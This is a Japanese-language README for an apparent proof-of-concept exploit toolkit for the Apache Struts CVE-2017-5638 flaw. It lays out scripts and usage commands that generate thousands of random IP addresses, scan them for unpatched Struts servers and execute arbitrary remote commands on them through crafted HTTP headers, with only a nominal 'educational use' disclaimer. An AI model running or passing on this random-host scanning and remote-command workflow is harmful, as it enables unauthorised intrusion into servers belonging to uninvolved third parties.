
Apache Struts CVE-2017-5638 用の概念実証エクスプロイト。ランダムな IP アドレスを生成し、脆弱なホストをスキャンし、細工された HTTP ヘッダーを介してリモートコマンドを実行します。
このプロジェクトは、Apache Strutsの脆弱性の概念実証です。 目的は、上記の脆弱性に対してランダムなIPアドレスを生成しテストするソフトウェアを作成することでした。
このプロジェクトは自己責任かつ教育目的でのみ使用してください。
cURL
Nmap
ランダムなIPアドレスを生成してテキストファイルに保存します。
./get_ip.sh [Number of hosts to scan] [What port to scan] [Filename to write output]
./get_ip.sh 10000 80 output.txt
特定のIPアドレスの脆弱性を確認します。
./struts_check.sh [ip address] [port]
./struts_check.sh 127.0.0.1 80
IPアドレスのリストの脆弱性を確認します。
./main.sh [Text file containing IP adresses] [Port]
./main.sh output.txt 443
Apache Strutsの脆弱性パッチが適用されていないサーバー上でコマンドを実行します。
./struts_attack.sh [IP Adres] [Command]
./struts_attack.sh https://127.0.0.1 whoami